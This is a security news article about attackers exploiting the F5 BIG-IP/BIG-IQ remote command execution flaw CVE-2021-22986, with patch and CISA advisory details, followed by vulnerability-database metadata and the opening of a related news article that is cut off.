Critical F5 BIG-IP Flaw Now Under Active Attack

2021-03-19T20:52:15

Description

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated. The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system. Earlier in March, F5 [issued a patch for the flaw](<https://threatpost.com/f5-cisa-critical-rce-bugs/164679/>), which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP. [![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) Fast forward to this week, researchers reported mass scanning for – and in-the-wild exploitation of – the flaw. “Starting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure,” said researchers with the NCC Group [on Thursday](<https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/>). “This knowledge, combined with having reproduced the full exploit-chain we assess that a public exploit is likely to be available in the public domain soon.” ## CISA, Researchers Urge Updating The U.S. Cybersecurity and Infrastructure Agency (CISA) has [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix the critical F5 flaw, along with another bug being tracked as [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>). This flaw, with a CVSS rating of 9.9, affects the infrastructure’s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages. > Opportunistic mass scanning activity detected from the following hosts checking for F5 iControl REST endpoints vulnerable to remote command execution (CVE-2021-22986). > > 112.97.56.78 (🇨🇳) 13.70.46.69 (🇭🇰) 115.236.5.58 (🇨🇳) > > Vendor advisory: <https://t.co/MsZmXEtcTn> [#threatintel](<https://twitter.com/hashtag/threatintel?src=hash&ref_src=twsrc%5Etfw>) > > — Bad Packets (@bad_packets) [March 19, 2021](<https://twitter.com/bad_packets/status/1372818419611885576?ref_src=twsrc%5Etfw>) The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs. “The F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data,” said Craig Young, principal security researcher at Tripwire in an email. “An attacker with full control over a load balancing appliance can also take control over the web applications served through it.” It’s not clear who is behind the exploitations; Threatpost has reached out to NCC Group for further comment. ## **Other Active Exploits of F5 Flaws** Security experts [in July urged companies](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to deploy an urgent patch for a critical vulnerability in F5 Networks’ networking devices, which was being actively exploited by attackers to scrape credentials, launch malware and more. The critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)) had a CVSS score of 10 out of 10. And in September, the U.S. government warned that Chinese threat actors successfully compromised several government and private sector entities by [exploiting vulnerabilities in F5 BIG-IP devices](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) (as well as Citrix and Pulse Secure VPNs and Microsoft Exchange servers). For this latest rash of exploit attempts, anyone running an affected version of BIG-IP should prioritize upgrade, said Young. “Any organization running BIG-IP or other network appliance with the management access exposed to the Internet should be re-evaluating their network layout and bringing those assets onto private networks,” he said. **_[Register for this LIVE Event](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)_****_: 0-Day Disclosures: Good, Bad & Ugly:_** **_On Mar. 24 at 2 p.m. ET_**_, Threatpost_ tackles how vulnerability disclosures can pose a risk to companies. To be discussed, Microsoft 0-days found in Exchange Servers. Join 0-day hunters from Intel Corp. and veteran bug bounty researchers who will untangle the 0-day economy and unpack what’s on the line for all businesses when it comes to the disclosure process. [Register NOW](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>) for this **LIVE **webinar on Wed., Mar. 24.

{"id": "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "type": "threatpost", "bulletinFamily": "info", "title": "Critical F5 BIG-IP Flaw Now Under Active Attack", "description": "Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.\n\nThe unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.\n\nEarlier in March, F5 [issued a patch for the flaw](<https://threatpost.com/f5-cisa-critical-rce-bugs/164679/>), which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nFast forward to this week, researchers reported mass scanning for \u2013 and in-the-wild exploitation of \u2013 the flaw.\n\n\u201cStarting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure,\u201d said researchers with the NCC Group [on Thursday](<https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/>). \u201cThis knowledge, combined with having reproduced the full exploit-chain we assess that a public exploit is likely to be available in the public domain soon.\u201d\n\n## CISA, Researchers Urge Updating\n\nThe U.S. Cybersecurity and Infrastructure Agency (CISA) has [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix the critical F5 flaw, along with another bug being tracked as [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>). This flaw, with a CVSS rating of 9.9, affects the infrastructure\u2019s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages.\n\n> Opportunistic mass scanning activity detected from the following hosts checking for F5 iControl REST endpoints vulnerable to remote command execution (CVE-2021-22986).\n> \n> 112.97.56.78 (\ud83c\udde8\ud83c\uddf3) \n13.70.46.69 (\ud83c\udded\ud83c\uddf0) \n115.236.5.58 (\ud83c\udde8\ud83c\uddf3)\n> \n> Vendor advisory: <https://t.co/MsZmXEtcTn> [#threatintel](<https://twitter.com/hashtag/threatintel?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Bad Packets (@bad_packets) [March 19, 2021](<https://twitter.com/bad_packets/status/1372818419611885576?ref_src=twsrc%5Etfw>)\n\nThe scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world\u2019s biggest financial institutions and ISPs.\n\n\u201cThe F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data,\u201d said Craig Young, principal security researcher at Tripwire in an email. \u201cAn attacker with full control over a load balancing appliance can also take control over the web applications served through it.\u201d\n\nIt\u2019s not clear who is behind the exploitations; Threatpost has reached out to NCC Group for further comment.\n\n## **Other Active Exploits of F5 Flaws**\n\nSecurity experts [in July urged companies](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which was being actively exploited by attackers to scrape credentials, launch malware and more. The critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)) had a CVSS score of 10 out of 10.\n\nAnd in September, the U.S. government warned that Chinese threat actors successfully compromised several government and private sector entities by [exploiting vulnerabilities in F5 BIG-IP devices](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) (as well as Citrix and Pulse Secure VPNs and Microsoft Exchange servers).\n\nFor this latest rash of exploit attempts, anyone running an affected version of BIG-IP should prioritize upgrade, said Young.\n\n\u201cAny organization running BIG-IP or other network appliance with the management access exposed to the Internet should be re-evaluating their network layout and bringing those assets onto private networks,\u201d he said.\n\n**_[Register for this LIVE Event](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)_****_: 0-Day Disclosures: Good, Bad & Ugly:_** **_On Mar. 24 at 2 p.m. ET_**_, Threatpost_ tackles how vulnerability disclosures can pose a risk to companies. To be discussed, Microsoft 0-days found in Exchange Servers. Join 0-day hunters from Intel Corp. and veteran bug bounty researchers who will untangle the 0-day economy and unpack what\u2019s on the line for all businesses when it comes to the disclosure process. [Register NOW](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>) for this **LIVE **webinar on Wed., Mar. 24.\n", "published": "2021-03-19T20:52:15", "modified": "2021-03-19T20:52:15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/critical-f5-big-ip-flaw-now-under-active-attack/164940/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/f5-cisa-critical-rce-bugs/164679/", "https://threatpost.com/newsletter-sign/", "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/", "https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq", "https://support.f5.com/csp/article/K18132488", "https://t.co/MsZmXEtcTn", "https://twitter.com/hashtag/threatintel?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/bad_packets/status/1372818419611885576?ref_src=twsrc%5Etfw", "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "https://support.f5.com/csp/article/K52145254", "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/", "https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/"], "cvelist": ["CVE-2020-5902", "CVE-2021-22986", "CVE-2021-22987"], "lastseen": "2021-03-19T21:53:52", "viewCount": 101, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1"]}, {"type": "cert", "idList": ["VU:290915"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0628", "CPAI-2021-0198"]}, {"type": "cisa", "idList": ["CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:A55091A825D08BAA55750010D4193771"]}, {"type": "cve", "idList": ["CVE-2020-5902", "CVE-2021-22986", "CVE-2021-22987"]}, {"type": "dsquare", "idList": ["E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:48642", "EDB-ID:48643", "EDB-ID:48711", "EDB-ID:49738"]}, {"type": "f5", "idList": ["F5:K56142644", "F5:K74151369"]}, {"type": "githubexploit", "idList": ["067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "08530E98-10F4-5651-8118-F76E99D5856F", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2D3AD059-4772-527B-A78C-724AFA1B109F", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "48FD5EC4-10B3-5CB3-96C6-4D70E2A52EEF", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4E7397B3-57E1-5961-BE00-E340DD46B130", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "66506397-D518-518F-B4A6-3C3F99602E30", "67F9A7F6-596E-5695-BCBF-B11FE476AD9E", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "7F937E02-A1B2-5F78-B140-90BC298729D4", "88373793-9076-5F05-BDBB-635A7E1BD897", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "91A5A7DD-3544-5856-890C-F8D738DAC6F4", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9E6B39D2-4F46-5C9D-81B9-32A2C96CBAD8", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "B417316F-A794-5234-BC9E-475C438FC35C", "B96958C0-96FF-52FF-A4B1-CE6F774F0C6F", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BF090D08-5787-5245-85E4-88DA87E8EC1D", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F6F649DA-905A-5158-B6BD-5A1F1F740C68"]}, {"type": "hackerone", "idList": ["H1:1519841"]}, {"type": "hivepro", "idList": ["HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mssecure", "idList": ["MSSECURE:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL03009991.NASL", "F5_BIGIP_SOL18132488.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_BIGIP_SOL70031188.NASL", "F5_CVE-2020-5902.NASL", "F5_CVE-2021-22986.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:162059", "PACKETSTORM:162066"]}, {"type": "ptsecurity", "idList": ["PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:72759E1136A76135F26DD97485912606", "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"]}, {"type": "securelist", "idList": ["SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4"]}, {"type": "seebug", "idList": ["SSV:99156"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:4959B86491B72239BCAF1958D167D57D", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:D31DB501A57ADE0C1DBD12724D8CA44C"]}, {"type": "threatpost", "idList": ["THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8"]}, {"type": "zdt", "idList": ["1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-36066", "1337DAY-ID-36067"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1"]}, {"type": "cert", "idList": ["VU:290915"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0628", "CPAI-2021-0198"]}, {"type": "cisa", "idList": ["CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:A55091A825D08BAA55750010D4193771"]}, {"type": "cve", "idList": ["CVE-2020-5902", "CVE-2021-22986", "CVE-2021-22987"]}, {"type": "dsquare", "idList": ["E-709"]}, {"type": "exploitdb", "idList": ["EDB-ID:48642", "EDB-ID:48643", "EDB-ID:49738"]}, {"type": "f5", "idList": ["F5:K56142644", "F5:K74151369"]}, {"type": "githubexploit", "idList": ["067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2D3AD059-4772-527B-A78C-724AFA1B109F", "350E6199-FA83-5A2F-91D3-19E2D2921801", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "431446A1-D76F-5889-BBDD-1C55456A4D73", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "49D58681-03E3-5607-8475-366F990C3706", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "66506397-D518-518F-B4A6-3C3F99602E30", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "7F937E02-A1B2-5F78-B140-90BC298729D4", "88373793-9076-5F05-BDBB-635A7E1BD897", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "9FE15986-BAC9-5740-8189-23E26F8399D5", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "B417316F-A794-5234-BC9E-475C438FC35C", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73"]}, {"type": "hivepro", "idList": ["HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/"]}, {"type": "mmpc", "idList": ["MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mssecure", "idList": ["MSSECURE:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL03009991.NASL", "F5_BIGIP_SOL18132488.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_BIGIP_SOL70031188.NASL", "F5_CVE-2020-5902.NASL", "F5_CVE-2021-22986.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:162059", "PACKETSTORM:162066"]}, {"type": "ptsecurity", "idList": ["PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:72759E1136A76135F26DD97485912606", "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"]}, {"type": "securelist", "idList": ["SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4"]}, {"type": "seebug", "idList": ["SSV:99156"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:4959B86491B72239BCAF1958D167D57D", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:D31DB501A57ADE0C1DBD12724D8CA44C"]}, {"type": "threatpost", "idList": ["THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:3132894F3650D97BBD8B8F473D9F1F4E", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8"]}, {"type": "zdt", "idList": ["1337DAY-ID-34652", "1337DAY-ID-36066", "1337DAY-ID-36067"]}]}, "exploitation": null, "vulnersScore": -0.6}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659988328, "score": 1659955861}, "_internal": {"score_hash": "a3ed722dad95d82c92bde72fa1ffec79"}}

{"cisa": [{"lastseen": "2021-08-02T18:07:56", "description": "F5 has released a [security advisory](<https://support.f5.com/csp/article/K02566623>) to address remote code execution (RCE) vulnerabilities\u2014[CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>), [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\u2014impacting BIG-IP and BIG-IQ devices. An attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators review the [F5 advisory](<https://support.f5.com/csp/article/K02566623>) and install updated software as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-10T00:00:00", "type": "cisa", "title": "F5 Security Advisory for RCE Vulnerabilities in BIG-IP, BIG-IQ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987"], "modified": "2021-03-10T00:00:00", "id": "CISA:A55091A825D08BAA55750010D4193771", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:46", "description": "F5 has released a security advisory to address a remote code execution (RCE) vulnerability\u2014[CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\u2014in the BIG-IP Traffic Management User Interface (TMUI). An attacker could exploit this vulnerability to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the F5 advisory for [CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) and upgrade to the appropriate version.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-04T00:00:00", "type": "cisa", "title": "F5 Releases Security Advisory for BIG-IP TMUI RCE vulnerability, CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-04T00:00:00", "id": "CISA:3219D2E89DB1680D9EF6F22691FC5829", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:25", "description": "[![](https://thehackernews.com/images/-fDHng6o_Mgc/YFYaPcYnvAI/AAAAAAAACEo/0OqPmutMPS0yEPCAkfPEvGz8Z0E8VNZ2QCLcBGAsYHQ/s0/f5.jpg)](<https://thehackernews.com/images/-fDHng6o_Mgc/YFYaPcYnvAI/AAAAAAAACEo/0OqPmutMPS0yEPCAkfPEvGz8Z0E8VNZ2QCLcBGAsYHQ/s0/f5.jpg>)\n\nAlmost 10 days after application security company F5 Networks [released patches](<https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html>) for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.\n\nNews of in the wild exploitation comes on the heels of a proof-of-concept exploit code that surfaced online earlier this week by reverse-engineering the Java software patch in BIG-IP. The [mass 